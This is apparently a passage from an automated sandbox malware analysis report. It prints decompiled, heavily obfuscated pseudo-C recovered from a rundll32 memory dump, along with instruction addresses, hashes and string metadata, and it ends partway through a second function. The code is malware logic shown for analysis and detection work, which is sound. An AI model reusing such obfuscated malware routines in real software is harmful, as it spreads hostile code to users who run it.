				_v84 = _v84 ^ 0x00e48483;
				_v124 = 0xa185d5;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 3;
				_v124 = _v124 ^ 0x143f3fdc;
				_v92 = 0xa97737;
				_v92 = _v92 ^ 0xeb9ba296;
				_v92 = _v92 ^ 0xeb365c56;
				_v132 = 0xbd678a;
				_v132 = _v132 + 0x8717;
				_v132 = _v132 | 0xacb35e9c;
				_v132 = _v132 ^ 0xacb35ba6;
				_v68 = 0x976f37;
				_v68 = _v68 + 0xffff737a;
				_v68 = _v68 ^ 0x00925dc3;
				_v200 = 0x3716ae;
				_v200 = _v200 * 0x3d;
				_v200 = _v200 + 0x7c18;
				_v200 = _v200 / _t779;
				_v200 = _v200 ^ 0x00164f5a;
				_v116 = 0x90307;
				_v116 = _v116 + 0xffff7314;
				_t780 = 0x73;
				_v116 = _v116 / _t780;
				_v116 = _v116 ^ 0x000cd282;
				_v76 = 0x344fd1;
				_v76 = _v76 | 0x7db0f0e8;
				_v76 = _v76 ^ 0x7db1d9db;
				_v216 = 0x1a88b7;
				_v216 = _v216 + 0xffff5c3b;
				_v216 = _v216 + 0xffff2820;
				_t876 = 9;
				_v216 = _v216 / _t876;
				_v216 = _v216 ^ 0x000cec9e;
				_v100 = 0x3ced92;
				_v100 = _v100 + 0xffff1312;
				_v100 = _v100 + 0xffffd55c;
				_v100 = _v100 ^ 0x00361c3b;
				_v184 = 0x789494;
				_v184 = _v184 + 0xffff0c7f;
				_v184 = _v184 << 1;
				_v184 = _v184 | 0x402d3e8e;
				_v184 = _v184 ^ 0x40e21003;
				_v192 = 0x310378;
				_v192 = _v192 << 0xb;
				_t781 = 0x22;
				_v192 = _v192 * 3;
				_v192 = _v192 + 0xffff6836;
				_v192 = _v192 ^ 0x985d636a;
				_v244 = 0xaa43bf;
				_v244 = _v244 / _t879;
				_v244 = _v244 << 0xf;
				_v244 = _v244 << 0xa;
				_v244 = _v244 ^ 0xb200e8c6;
				_v188 = 0xd75c86;
				_v188 = _v188 << 9;
				_v188 = _v188 | 0x025244f6;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0xd553b68a;
				_v144 = 0x6e01bd;
				_v144 = _v144 ^ 0x0f7c0b9c;
				_v144 = _v144 / _t781;
				_v144 = _v144 ^ 0x007182e2;
				_v156 = 0xaeb978;
				_t782 = 0x1e;
				_v156 = _v156 / _t782;
				_v156 = _v156 + 0xffff8ee7;
				_v156 = _v156 ^ 0x000c354b;
				_v232 = 0x8c6aee;
				_v232 = _v232 ^ 0x1b23a9db;
				_v232 = _v232 + 0x8ee1;
				_v232 = _v232 + 0x44;
				_v232 = _v232 ^ 0x1bb20ffb;
				_v240 = 0xc4628c;
				_v240 = _v240 >> 0xd;
				_t783 = 0x6e;
				_v240 = _v240 / _t783;
				_v240 = _v240 + 0x5eea;
				_v240 = _v240 ^ 0x000cb0fe;
				_v64 = 0xd4a535;
				_v64 = _v64 ^ 0x78f16673;
				_v64 = _v64 ^ 0x7824c526;
				_v256 = 0x55d7a8;
				_v256 = _v256 ^ 0x05430866;
				_v256 = _v256 | 0xfffce0d7;
				_v256 = _v256 ^ 0xfff12a33;
				_v164 = 0xd10b34;
				_v164 = _v164 + 0xffffcbea;
				_v164 = _v164 + 0xffff01f2;
				_v164 = _v164 ^ 0x00ca8dd0;
				_v264 = 0x73bd71;
				_v264 = _v264 << 0xe;
				_v264 = _v264 >> 7;
				_v264 = _v264 << 0xa;
				_v264 = _v264 ^ 0x7ae6d472;
				_v172 = 0xd09f93;
				_v172 = _v172 + 0xffffeac5;
				_v172 = _v172 << 5;
				_v172 = _v172 ^ 0x1a1189dc;
				_v272 = 0xce1f77;
				_t784 = 0x5f;
				_v272 = _v272 / _t784;
				_t785 = 0x47;
				_v272 = _v272 * 0xd;
				_v272 = _v272 << 5;
				_v272 = _v272 ^ 0x0388d6fc;
				_v72 = 0xd0da8a;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x068dcd32;
				_v280 = 0xa513be;
				_v280 = _v280 + 0xffffcd90;
				_v280 = _v280 / _t785;
				_v280 = _v280 + 0xffffce89;
				_v280 = _v280 ^ 0x00081bd8;
				_v112 = 0xe9df;
				_t786 = 0x11;
				_v112 = _v112 * 0xd;
				_v112 = _v112 ^ 0xaf5ec247;
				_v112 = _v112 ^ 0xaf5aa6d7;
				_v180 = 0xdb028a;
				_v180 = _v180 * 0x1d;
				_v180 = _v180 >> 6;
				_v180 = _v180 ^ 0x0069b9f3;
				_v220 = 0xee6b4b;
				_v220 = _v220 << 3;
				_v220 = _v220 | 0xdc702aa0;
				_v220 = _v220 + 0x71ee;
				_v220 = _v220 ^ 0xdf76f250;
				_v296 = 0x23c05a;
				_v296 = _v296 * 0x5f;
				_v296 = _v296 * 0x36;
				_v296 = _v296 + 0xca24;
				_v296 = _v296 ^ 0xcc673138;
				_v176 = 0x22be9e;
				_v176 = _v176 * 0x5d;
				_v176 = _v176 >> 0xe;
				_v176 = _v176 ^ 0x000fc27c;
				_v120 = 0x3d033e;
				_v120 = _v120 | 0x1fa14a75;
				_v120 = _v120 / _t786;
				_v120 = _v120 ^ 0x01d2865b;
				_v212 = 0xed5cb5;
				_t787 = 0x53;
				_v212 = _v212 / _t787;
				_v212 = _v212 ^ 0x510fb6d8;
				_v212 = _v212 * 0x76;
				_v212 = _v212 ^ 0x5c26df9e;
				_v32 = 0x743d42;
				_v32 = _v32 * 0x19;
				_v32 = _v32 ^ 0x0b543fb1;
				_v140 = 0xd2e396;
				_v140 = _v140 + 0xbc2f;
				_v140 = _v140 | 0xffabdfb7;
				_v140 = _v140 ^ 0xfffefe2d;
				_v56 = 0xb6af07;
				_v56 = _v56 | 0x3c719b52;
				_v56 = _v56 ^ 0x3cf6fc1e;
				_v148 = 0x4e57f8;
				_v148 = _v148 / _t876;
				_v148 = _v148 << 4;
				_v148 = _v148 ^ 0x008180da;
				_t880 = 0x8b31915;
				_v44 = 0xa59d4d;
				_t877 = 0xef66089;
				_t788 = 0x2c;
				_v44 = _v44 / _t788;
				_v44 = _v44 ^ 0x000f19f4;
				_v60 = 0x2ad52f;
				_v60 = _v60 | 0x792352db;
				_v60 = _v60 ^ 0x7927d8fa;
				while(1) {
					L1:
					while(1) {
						L2:
						_t789 = 0x93fa1a;
						while(1) {
							L3:
							_t859 = 0x2c1be6e;
							do {
								L4:
								_t891 = _t765 - _t880;
								if(_t891 > 0) {
									__eflags = _t765 - 0x92c7fbc;
									if(__eflags == 0) {
										_t765 = 0x826e25d;
										goto L27;
									} else {
										__eflags = _t765 - 0xb519ee2;
										if(__eflags == 0) {
											_push(_v132);
											_t654 =  &_v92; // 0xeb365c56
											_push( *_t654);
											_push(0x2b1518);
											_t759 = E002CFBCF(_v68,  &_v12, _v20, _v200, _v116, _v76, E002BAB66(_v84, _v124, __eflags), _v208, _v216, _v84,  &_v8);
											_t885 = _t885 + 0x30;
											__eflags = _t759 - _v108;
											_t765 =  ==  ? 0x2c1be6e : _t877;
											E002BAE03(_v100, _v184, _v192, _t757);
											goto L25;
										} else {
											__eflags = _t765 - 0xcf70aca;
											if(_t765 == 0xcf70aca) {
												E002B68DE(_v32, _v140, _v56, _v148, _v16);
												_t885 = _t885 + 0xc;
												_t765 = _t877;
												goto L1;
											} else {
												__eflags = _t765 - _t877;
												if(__eflags != 0) {
													goto L27;
												} else {
													E002B7027(_v44, _v52, _v20, _v60);
												}
											}
										}
									}
								} else {
									if(_t891 == 0) {
										_t736 = E002C3B45(_v224, _v156, _v232, _v240, _v64, _v248, _v12, _v256, _v16, _v20, _t789, _v164,  &_v24, _v264);
										_t885 = _t885 + 0x30;
										__eflags = _t736 - _v28;
										_t789 = 0x93fa1a;
										_t738 = 0x70434dd;
										_t765 =  ==  ? 0x93fa1a : 0xcf70aca;
										goto L3;
									} else {
										if(_t765 == _t789) {
											_t739 = E002BBA16(_a24, _v172, _v24, _v272, _v72, _v280, _a20, _v288);
											_t885 = _t885 + 0x18;
											__eflags = _t739 - _v40;
											_t738 = 0x70434dd;
											_t765 =  ==  ? 0x70434dd : 0x275f79a;
											goto L2;
										} else {
											if(_t765 == 0x275f79a) {
												E002BE723(_v296, _v176, _v24, _v120, _v212);
												_t885 = _t885 + 0xc;
												_t765 = 0xcf70aca;
												while(1) {
													L1:
													goto L2;
												}
											} else {
												if(_t765 == _t859) {
													_push(_t789);
													_push(_t789);
													_t745 = E002C3512(_v12);
													__eflags = _t745;
													_v16 = _t745;
													_t765 =  !=  ? _t880 : _t877;
													while(1) {
														L1:
														goto L2;
													}
												} else {
													if(_t765 == _t738) {
														_t746 = E002CFDA3(_v112, _a8, _v180, _v24, _v220, _v128, 0x20);
														_t885 = _t885 + 0x14;
														_t765 = 0x275f79a;
														__eflags = _t746 - _v252;
														_t883 =  ==  ? 1 : _t883;
														while(1) {
															L1:
															L2:
															_t789 = 0x93fa1a;
															L3:
															_t859 = 0x2c1be6e;
															goto L4;
														}
													} else {
														_t896 = _t765 - 0x826e25d;
														if(_t765 == 0x826e25d) {
															_push(_v96);
															_push(_v292);
															_push(0x2b1568);
															_t749 = E002BAB66(_v88, _v152, _t896);
															_push(_v136);
															_push(_v236);
															_push(0x2b1538);
															E002C0EDA(E002BAB66(_v168, _v48, _t896), _v276, _v104, _t749,  &_v20, _v196, _v284);
															_t765 =  ==  ? 0xb519ee2 : 0x7228e80;
															E002BAE03(_v268, _v228, _v160, _t749);
															E002BAE03(_v36, _v260, _v204, _t750);
															_t885 = _t885 + 0x3c;
															_t877 = 0xef66089;
															L25:
															_t880 = 0x8b31915;
															_t738 = 0x70434dd;
															_t789 = 0x93fa1a;
															_t859 = 0x2c1be6e;
														}
														goto L27;
													}
												}
											}
										}
									}
								}
								L22:
								return _t883;
								L27:
							} while (_t765 != 0x7228e80);
							goto L22;
						}
					}
				}
			}

















































































































                                                                                                                      0x002c183b
                                                                                                                      0x002c1842
                                                                                                                      0x002c1849
                                                                                                                      0x002c184b
                                                                                                                      0x002c1852
                                                                                                                      0x002c1859
                                                                                                                      0x002c1860
                                                                                                                      0x002c1862
                                                                                                                      0x002c1867
                                                                                                                      0x002c186f
                                                                                                                      0x002c1879
                                                                                                                      0x002c187b
                                                                                                                      0x002c1882
                                                                                                                      0x002c1883
                                                                                                                      0x002c188e
                                                                                                                      0x002c189a
                                                                                                                      0x002c189e
                                                                                                                      0x002c18a6
                                                                                                                      0x002c18b1
                                                                                                                      0x002c18bc
                                                                                                                      0x002c18c7
                                                                                                                      0x002c18cf
                                                                                                                      0x002c18dc
                                                                                                                      0x002c18df
                                                                                                                      0x002c18e3
                                                                                                                      0x002c18e8
                                                                                                                      0x002c18f0
                                                                                                                      0x002c18fb
                                                                                                                      0x002c1906
                                                                                                                      0x002c1911
                                                                                                                      0x002c191c
                                                                                                                      0x002c1924
                                                                                                                      0x002c192c
                                                                                                                      0x002c1934
                                                                                                                      0x002c193c
                                                                                                                      0x002c1944
                                                                                                                      0x002c1951
                                                                                                                      0x002c1955
                                                                                                                      0x002c195a
                                                                                                                      0x002c1962
                                                                                                                      0x002c196d
                                                                                                                      0x002c1978
                                                                                                                      0x002c1983
                                                                                                                      0x002c198b
                                                                                                                      0x002c1993
                                                                                                                      0x002c199f
                                                                                                                      0x002c19a2
                                                                                                                      0x002c19a6
                                                                                                                      0x002c19ae
                                                                                                                      0x002c19c1
                                                                                                                      0x002c19c8
                                                                                                                      0x002c19d3
                                                                                                                      0x002c19de
                                                                                                                      0x002c19e9
                                                                                                                      0x002c19f4
                                                                                                                      0x002c19ff
                                                                                                                      0x002c1a0c
                                                                                                                      0x002c1a10
                                                                                                                      0x002c1a15
                                                                                                                      0x002c1a1d
                                                                                                                      0x002c1a27
                                                                                                                      0x002c1a32
                                                                                                                      0x002c1a3d
                                                                                                                      0x002c1a48
                                                                                                                      0x002c1a53
                                                                                                                      0x002c1a5e
                                                                                                                      0x002c1a69
                                                                                                                      0x002c1a74
                                                                                                                      0x002c1a7c
                                                                                                                      0x002c1a87
                                                                                                                      0x002c1a92
                                                                                                                      0x002c1a9a
                                                                                                                      0x002c1aa2
                                                                                                                      0x002c1aaa
                                                                                                                      0x002c1aaf
                                                                                                                      0x002c1ab7
                                                                                                                      0x002c1ac2
                                                                                                                      0x002c1acd
                                                                                                                      0x002c1ad8
                                                                                                                      0x002c1ae3
                                                                                                                      0x002c1aee
                                                                                                                      0x002c1af6
                                                                                                                      0x002c1b01
                                                                                                                      0x002c1b16
                                                                                                                      0x002c1b19
                                                                                                                      0x002c1b20
                                                                                                                      0x002c1b2b
                                                                                                                      0x002c1b3b
                                                                                                                      0x002c1b3f
                                                                                                                      0x002c1b47
                                                                                                                      0x002c1b4f
                                                                                                                      0x002c1b57
                                                                                                                      0x002c1b62
                                                                                                                      0x002c1b6d
                                                                                                                      0x002c1b75
                                                                                                                      0x002c1b80
                                                                                                                      0x002c1b8b
                                                                                                                      0x002c1b96
                                                                                                                      0x002c1ba1
                                                                                                                      0x002c1bac
                                                                                                                      0x002c1bb8
                                                                                                                      0x002c1bbd
                                                                                                                      0x002c1bc3
                                                                                                                      0x002c1bcb
                                                                                                                      0x002c1bd0
                                                                                                                      0x002c1bd8
                                                                                                                      0x002c1be0
                                                                                                                      0x002c1be5
                                                                                                                      0x002c1bed
                                                                                                                      0x002c1bf0
                                                                                                                      0x002c1bf4
                                                                                                                      0x002c1bfc
                                                                                                                      0x002c1c04
                                                                                                                      0x002c1c11
                                                                                                                      0x002c1c15
                                                                                                                      0x002c1c1d
                                                                                                                      0x002c1c25
                                                                                                                      0x002c1c2d
                                                                                                                      0x002c1c32
                                                                                                                      0x002c1c3a
                                                                                                                      0x002c1c42
                                                                                                                      0x002c1c4a
                                                                                                                      0x002c1c5d
                                                                                                                      0x002c1c64
                                                                                                                      0x002c1c6c
                                                                                                                      0x002c1c77
                                                                                                                      0x002c1c84
                                                                                                                      0x002c1c8f
                                                                                                                      0x002c1c9a
                                                                                                                      0x002c1ca2
                                                                                                                      0x002c1caa
                                                                                                                      0x002c1cb2
                                                                                                                      0x002c1cb7
                                                                                                                      0x002c1cbf
                                                                                                                      0x002c1ccd
                                                                                                                      0x002c1cd2
                                                                                                                      0x002c1cdc
                                                                                                                      0x002c1ce1
                                                                                                                      0x002c1cec
                                                                                                                      0x002c1cef
                                                                                                                      0x002c1cf3
                                                                                                                      0x002c1cfb
                                                                                                                      0x002c1d06
                                                                                                                      0x002c1d11
                                                                                                                      0x002c1d1c
                                                                                                                      0x002c1d27
                                                                                                                      0x002c1d2f
                                                                                                                      0x002c1d37
                                                                                                                      0x002c1d42
                                                                                                                      0x002c1d4d
                                                                                                                      0x002c1d58
                                                                                                                      0x002c1d63
                                                                                                                      0x002c1d6e
                                                                                                                      0x002c1d79
                                                                                                                      0x002c1d84
                                                                                                                      0x002c1d8f
                                                                                                                      0x002c1d9a
                                                                                                                      0x002c1da5
                                                                                                                      0x002c1db0
                                                                                                                      0x002c1dbd
                                                                                                                      0x002c1dc1
                                                                                                                      0x002c1dd1
                                                                                                                      0x002c1dd5
                                                                                                                      0x002c1ddd
                                                                                                                      0x002c1de8
                                                                                                                      0x002c1dfa
                                                                                                                      0x002c1dff
                                                                                                                      0x002c1e08
                                                                                                                      0x002c1e13
                                                                                                                      0x002c1e1e
                                                                                                                      0x002c1e29
                                                                                                                      0x002c1e34
                                                                                                                      0x002c1e3c
                                                                                                                      0x002c1e44
                                                                                                                      0x002c1e50
                                                                                                                      0x002c1e53
                                                                                                                      0x002c1e57
                                                                                                                      0x002c1e5f
                                                                                                                      0x002c1e6a
                                                                                                                      0x002c1e75
                                                                                                                      0x002c1e80
                                                                                                                      0x002c1e8b
                                                                                                                      0x002c1e96
                                                                                                                      0x002c1ea1
                                                                                                                      0x002c1ea8
                                                                                                                      0x002c1eb5
                                                                                                                      0x002c1ec0
                                                                                                                      0x002c1ec8
                                                                                                                      0x002c1ed4
                                                                                                                      0x002c1ed7
                                                                                                                      0x002c1ede
                                                                                                                      0x002c1ee9
                                                                                                                      0x002c1ef4
                                                                                                                      0x002c1f04
                                                                                                                      0x002c1f08
                                                                                                                      0x002c1f0d
                                                                                                                      0x002c1f12
                                                                                                                      0x002c1f1a
                                                                                                                      0x002c1f25
                                                                                                                      0x002c1f2d
                                                                                                                      0x002c1f40
                                                                                                                      0x002c1f47
                                                                                                                      0x002c1f52
                                                                                                                      0x002c1f5d
                                                                                                                      0x002c1f73
                                                                                                                      0x002c1f7a
                                                                                                                      0x002c1f85
                                                                                                                      0x002c1f97
                                                                                                                      0x002c1f9c
                                                                                                                      0x002c1fa5
                                                                                                                      0x002c1fb0
                                                                                                                      0x002c1fbb
                                                                                                                      0x002c1fc3
                                                                                                                      0x002c1fcb
                                                                                                                      0x002c1fd3
                                                                                                                      0x002c1fd8
                                                                                                                      0x002c1fe0
                                                                                                                      0x002c1fe8
                                                                                                                      0x002c1ff1
                                                                                                                      0x002c1ff6
                                                                                                                      0x002c1ffc
                                                                                                                      0x002c2004
                                                                                                                      0x002c200c
                                                                                                                      0x002c2017
                                                                                                                      0x002c2022
                                                                                                                      0x002c202d
                                                                                                                      0x002c2035
                                                                                                                      0x002c203d
                                                                                                                      0x002c2045
                                                                                                                      0x002c204d
                                                                                                                      0x002c2058
                                                                                                                      0x002c2063
                                                                                                                      0x002c206e
                                                                                                                      0x002c2079
                                                                                                                      0x002c2081
                                                                                                                      0x002c2086
                                                                                                                      0x002c208b
                                                                                                                      0x002c2090
                                                                                                                      0x002c2098
                                                                                                                      0x002c20a3
                                                                                                                      0x002c20ae
                                                                                                                      0x002c20b6
                                                                                                                      0x002c20c1
                                                                                                                      0x002c20cd
                                                                                                                      0x002c20d0
                                                                                                                      0x002c20dd
                                                                                                                      0x002c20e0
                                                                                                                      0x002c20e4
                                                                                                                      0x002c20e9
                                                                                                                      0x002c20f1
                                                                                                                      0x002c20fc
                                                                                                                      0x002c2104
                                                                                                                      0x002c210f
                                                                                                                      0x002c2117
                                                                                                                      0x002c2127
                                                                                                                      0x002c212b
                                                                                                                      0x002c2133
                                                                                                                      0x002c213b
                                                                                                                      0x002c214e
                                                                                                                      0x002c2151
                                                                                                                      0x002c2158
                                                                                                                      0x002c2163
                                                                                                                      0x002c216e
                                                                                                                      0x002c2181
                                                                                                                      0x002c2188
                                                                                                                      0x002c2190
                                                                                                                      0x002c219b
                                                                                                                      0x002c21a3
                                                                                                                      0x002c21a8
                                                                                                                      0x002c21b0
                                                                                                                      0x002c21b8
                                                                                                                      0x002c21c0
                                                                                                                      0x002c21cd
                                                                                                                      0x002c21d6
                                                                                                                      0x002c21da
                                                                                                                      0x002c21e2
                                                                                                                      0x002c21ea
                                                                                                                      0x002c21fd
                                                                                                                      0x002c2204
                                                                                                                      0x002c220c
                                                                                                                      0x002c2217
                                                                                                                      0x002c2222
                                                                                                                      0x002c2238
                                                                                                                      0x002c223f
                                                                                                                      0x002c224a
                                                                                                                      0x002c2256
                                                                                                                      0x002c225b
                                                                                                                      0x002c225f
                                                                                                                      0x002c226c
                                                                                                                      0x002c2270
                                                                                                                      0x002c2278
                                                                                                                      0x002c228b
                                                                                                                      0x002c2292
                                                                                                                      0x002c229d
                                                                                                                      0x002c22a8
                                                                                                                      0x002c22b3
                                                                                                                      0x002c22be
                                                                                                                      0x002c22c9
                                                                                                                      0x002c22d4
                                                                                                                      0x002c22df
                                                                                                                      0x002c22ea
                                                                                                                      0x002c22fe
                                                                                                                      0x002c2305
                                                                                                                      0x002c230f
                                                                                                                      0x002c231a
                                                                                                                      0x002c231f
                                                                                                                      0x002c232a
                                                                                                                      0x002c2338
                                                                                                                      0x002c233b
                                                                                                                      0x002c2342
                                                                                                                      0x002c234d
                                                                                                                      0x002c2358
                                                                                                                      0x002c2363
                                                                                                                      0x002c236e
                                                                                                                      0x002c236e
                                                                                                                      0x002c2373
                                                                                                                      0x002c2373
                                                                                                                      0x002c2373
                                                                                                                      0x002c2378
                                                                                                                      0x002c2378
                                                                                                                      0x002c2378
                                                                                                                      0x002c237d
                                                                                                                      0x002c237d
                                                                                                                      0x002c237d
                                                                                                                      0x002c237f
                                                                                                                      0x002c25fc
                                                                                                                      0x002c2602
                                                                                                                      0x002c2739
                                                                                                                      0x00000000
                                                                                                                      0x002c2608
                                                                                                                      0x002c2608
                                                                                                                      0x002c260e
                                                                                                                      0x002c2682
                                                                                                                      0x002c2689
                                                                                                                      0x002c2689
                                                                                                                      0x002c269e
                                                                                                                      0x002c26e9
                                                                                                                      0x002c26ee
                                                                                                                      0x002c26fc
                                                                                                                      0x002c2712
                                                                                                                      0x002c271c
                                                                                                                      0x00000000
                                                                                                                      0x002c2610
                                                                                                                      0x002c2610
                                                                                                                      0x002c2616
                                                                                                                      0x002c2673
                                                                                                                      0x002c2678
                                                                                                                      0x002c267b
                                                                                                                      0x00000000
                                                                                                                      0x002c2618
                                                                                                                      0x002c2618
                                                                                                                      0x002c261a
                                                                                                                      0x00000000
                                                                                                                      0x002c2620
                                                                                                                      0x002c263c
                                                                                                                      0x002c2642
                                                                                                                      0x002c261a
                                                                                                                      0x002c2616
                                                                                                                      0x002c260e
                                                                                                                      0x002c2385
                                                                                                                      0x002c2385
                                                                                                                      0x002c25d2
                                                                                                                      0x002c25d9
                                                                                                                      0x002c25e8
                                                                                                                      0x002c25ea
                                                                                                                      0x002c25ef
                                                                                                                      0x002c25f4
                                                                                                                      0x00000000
                                                                                                                      0x002c238b
                                                                                                                      0x002c238d
                                                                                                                      0x002c255c
                                                                                                                      0x002c2563
                                                                                                                      0x002c2572
                                                                                                                      0x002c2574
                                                                                                                      0x002c2579
                                                                                                                      0x00000000
                                                                                                                      0x002c2393
                                                                                                                      0x002c2399
                                                                                                                      0x002c251b
                                                                                                                      0x002c2520
                                                                                                                      0x002c2523
                                                                                                                      0x002c236e
                                                                                                                      0x002c236e
                                                                                                                      0x00000000
                                                                                                                      0x002c236e
                                                                                                                      0x002c239f
                                                                                                                      0x002c23a1
                                                                                                                      0x002c24db
                                                                                                                      0x002c24dc
                                                                                                                      0x002c24e4
                                                                                                                      0x002c24e9
                                                                                                                      0x002c24eb
                                                                                                                      0x002c24f6
                                                                                                                      0x002c236e
                                                                                                                      0x002c236e
                                                                                                                      0x00000000
                                                                                                                      0x002c236e
                                                                                                                      0x002c23a7
                                                                                                                      0x002c23a9
                                                                                                                      0x002c24a9
                                                                                                                      0x002c24b7
                                                                                                                      0x002c24ba
                                                                                                                      0x002c24bf
                                                                                                                      0x002c24c1
                                                                                                                      0x002c236e
                                                                                                                      0x002c236e
                                                                                                                      0x002c2373
                                                                                                                      0x002c2373
                                                                                                                      0x002c2378
                                                                                                                      0x002c2378
                                                                                                                      0x00000000
                                                                                                                      0x002c2378
                                                                                                                      0x002c23af
                                                                                                                      0x002c23af
                                                                                                                      0x002c23b5
                                                                                                                      0x002c23bb
                                                                                                                      0x002c23c2
                                                                                                                      0x002c23d4
                                                                                                                      0x002c23d9
                                                                                                                      0x002c23e3
                                                                                                                      0x002c23ea
                                                                                                                      0x002c23fc
                                                                                                                      0x002c2429
                                                                                                                      0x002c2452
                                                                                                                      0x002c2459
                                                                                                                      0x002c246e
                                                                                                                      0x002c2473
                                                                                                                      0x002c2476
                                                                                                                      0x002c2723
                                                                                                                      0x002c2723
                                                                                                                      0x002c2728
                                                                                                                      0x002c272d
                                                                                                                      0x002c2732
                                                                                                                      0x002c2732
                                                                                                                      0x00000000
                                                                                                                      0x002c23b5
                                                                                                                      0x002c23a9
                                                                                                                      0x002c23a1
                                                                                                                      0x002c2399
                                                                                                                      0x002c238d
                                                                                                                      0x002c2385
                                                                                                                      0x002c2645
                                                                                                                      0x002c264f
                                                                                                                      0x002c273e
                                                                                                                      0x002c273e
                                                                                                                      0x00000000
                                                                                                                      0x002c274a
                                                                                                                      0x002c2378
                                                                                                                      0x002c2373

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: B=t$D$D'$Kk$V\6$W7$\9$d_2$^$q
                                                                                                                      • API String ID: 0-1686049362
                                                                                                                      • Opcode ID: 28bc3e8e0e07511334ff854b65d5643efcadc6b62fe3412fea05d37800284915
                                                                                                                      • Instruction ID: f5bf49cab88037b0ce628852c454c910c5a345831289a799266f410aac098b8e
                                                                                                                      • Opcode Fuzzy Hash: 28bc3e8e0e07511334ff854b65d5643efcadc6b62fe3412fea05d37800284915
                                                                                                                      • Instruction Fuzzy Hash: 8A72FF715083819BD378CF65C58AB8FBBE2BBC4344F108A1DE2DA96260D7B18959CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C99AA Relevance: 12.9, Strings: 10, Instructions: 384COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002C99AA() {
				void* _t393;
				signed int _t395;
				signed int _t396;
				signed int _t399;
				signed int _t401;
				signed int _t405;
				signed int _t416;
				void* _t420;
				intOrPtr* _t464;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t485;
				void* _t489;

				 *(_t489 + 0x98) = 0xc8da52;
				 *(_t489 + 0xa0) = 0;
				 *((intOrPtr*)(_t489 + 0x9c)) = 0xe0694f;
				_t420 = 0x1be807e;
				 *(_t489 + 0x30) = 0x503fa2;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) >> 8;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) | 0x613cd221;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0x613cd23e;
				 *((intOrPtr*)(_t489 + 0x18)) = 0x638b33;
				 *((intOrPtr*)(_t489 + 0x18)) =  *((intOrPtr*)(_t489 + 0x18)) + 0x7670;
				 *(_t489 + 0xa4) = 0;
				_t471 = 0x25;
				 *(_t489 + 0x2c) =  *(_t489 + 0x28) / _t471;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) + 0xfffff8bb;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) ^ 0x0002acab;
				 *(_t489 + 0x7c) = 0x85e0fa;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) + 0x3665;
				_t472 = 0x78;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) / _t472;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) ^ 0x00011e0c;
				 *(_t489 + 0x20) = 0x383fb4;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0xbc1f7ed2;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x73642c82;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) >> 0xa;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x003dbfb6;
				 *(_t489 + 0x5c) = 0xbb8564;
				_t473 = 0x44;
				 *(_t489 + 0x5c) =  *(_t489 + 0x5c) / _t473;
				_t474 = 0x6f;
				 *(_t489 + 0x58) =  *(_t489 + 0x5c) * 0x17;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x00393d4f;
				 *(_t489 + 0x14) = 0x7f7e5e;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0xaaec;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0x89a4;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) >> 0xe;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0x000cd586;
				 *(_t489 + 0x98) = 0xf466ca;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21e472eb;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21177926;
				 *(_t489 + 0x8c) = 0xf41dfa;
				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) << 7;
				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) ^ 0x7a009fd6;
				 *(_t489 + 0x70) = 0x5bd344;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffffa539;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd954c9cc;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd906e478;
				 *(_t489 + 0x20) = 0x13a841;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) * 0x2b;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x070f8edd;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) / _t474;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x0006f8e9;
				 *(_t489 + 0x38) = 0xfa8d3a;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xb40d;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) >> 0xd;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xfffffdcd;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) ^ 0x0000539f;
				 *(_t489 + 0x48) = 0x9c2d9c;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) + 0xffff4328;
